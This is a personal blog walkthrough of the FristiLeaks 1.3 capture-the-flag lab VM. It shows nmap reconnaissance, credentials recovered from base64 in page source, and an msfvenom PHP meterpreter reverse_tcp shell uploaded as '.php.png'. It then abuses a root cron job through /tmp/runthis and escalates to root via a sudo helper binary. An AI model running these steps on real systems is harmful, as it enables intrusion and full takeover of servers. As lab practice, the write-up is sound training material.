Saturday, 15 October 2016

CTF FristiLeaks: 1.3 - Walkthrough

I generally doesn't solves CTFs but after viewing walkthrough of one of my close friend i thought even i must give it a try :P (yea these days i had less work as compared to past some weeks and i watched too much movies ;_;).

So, i thought to try fristileak 1.3. Yea in beginning it was a bit puzzling but then i started having idea about further challenges one after another.

So First thing's first lets scan for live hosts in our network and grab open ports of the target host.

$ nmap -sn

$ nmap -T4 -A -v

OK ! so i got port 80 open here with 3 disallowed entries /cola , /sisi, /beer. Nice lets check em

Our main page, lets check for cola,sisi,beer :D 

Damn !! i got nothing except this meme :/ so here i tried some random links and finally found something on /fristi :D and yea it was a login page !!

here i begin checking page source and found some encrypted info, as much as my guess it was base64.

here i scrolled a bit up and found image being decoded, i decided to replace the encrypted code of image with the base64 i found apart from whole code.

Bingo !! after decoding base64 i got some weird text "keKKeKKeKkEkkEk". LOL easy guess "PASSWORD" :V . I then started searching for username and the one thing which diverted my mind the most, there was a note inside the source of page.

 We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz

Now here nothing is looking so suspicious except the name of the one who left this comment "eezeepz".

i decided to make combination like 

username : eezeepz
password : keKKeKKeKkEkkEk

and got successful access :D wew !!

next i found only option to upload files but in image format (as i tried to it directly with .php format and that didn't worked).

So i generated php payload via msfvenom and changed its format to .php.png

$  sudo msfvenom -p php/meterpreter/reverse_tcp lhost= lport=4444 -f raw

lol meterpreter i love u :P 

Lets try to gain access to bash shell :D 

Lets check users in home dir.

ok so there are 3 users in which i have permission to access "eezeepz" user's directory.

I did "ls -la" to list all dir with their respected permissions. There were so many files which were like some commands of /user/bin file but one file attracted my attention it was a txt file named "notes.txt" so i decided "cat notes.txt" to open it. and i found hints for next challenge.

ok so as it simply says, i have privilege to use commands like , chmod, df , cat, echo, ps, grep, egrep.
and i if i execute anyone of'em by making file "runthis" in /tmp dir, ill have my results delivered to file named "cronresult". LOL no guess it was sure that user admin is source to other user and eventually to root. "chmod 777 admin -R"

i decided to change permission of user admin's dir as i got privilege to use command "chmod". I executed following set of commands and got positive result as expected :P. 

$ echo “/usr/bin/../../bin/chmod –R 777 /home/admin” > /tmp/runthis 
$ ls -lah /home
$ ls -alh /home/admin

Found some suspicious text files which could be hint to another challenge.

-- whoisyourgodnow.txt
-- cryptedpass.txt

2 files were with some encrypted text in which one of em was in base64 and other was some random text (as much as i guessed) and the 3rd one was a python file to decode those pass. I decided to decoded one of'em, thought to gave a start with that base64 one.

So it was a password (guessed so , cos password for admin panel was also being disclosed in the same manner)

I decided to try for fristigod. and got successfully login :) 

after owning fistigod user i came one step more closer to root :D 

So i was in dir /var/fistigod as i unfortunately didn't found any hint in /home/fristigod/. There i noticed some hidden files one of them was .bash_history , i decided to open it and found some set of commands have been recorded in that file, like whosoever been there before me had used em, i thought to give them a try ( 3:) evil mind)

$ cat .bash_history 

ls -lah
cd .secret_admin_stuff/
./doCom test
sudo ls
cd .secret_admin_stuff/
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
ls -lah
usermod -G fristigod fristi
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e


hmm ... 

Okay !! now i was a bit tired and decided to do "sudo -l" to get the $PATH

"/var/fristigod/.secret_admin_stuff/doCom" its was a clear hint that this file have some privilege to change permissions or to do some tasks from root's permission , cos its owned by root.

i decided to execute this file "doCom"

$  ./.secret_admin_stuff/doCom

and got prompted with result 

"Nice try , But wrong user ;)"

There i decided to use "sudo" with argument "-u"

$ sudo -u fristi ./.secret_admin_stuff/doCom

Again i got an hint of usage of this file 

"Usage: ./program_name terminal_command ..."

lol here i got some idea that this file will elevate privilege of files of our choice :P i decided to go with /bin/bash, after all who the hell doesn't wants /bin/bash have full privilege? ( 3:D evil mind)

$ sudo -u fristi ./.secret_admin_stuff/doCom /bin/bash


Thx Aaditya Purani :D for being an inspiration bro :D post dedicated to u bro ^_^

=> Walkthrough to Billy Madison 1.1 By Aaditya Purani


Okay !! So here i ends up this post :) hope you like it :)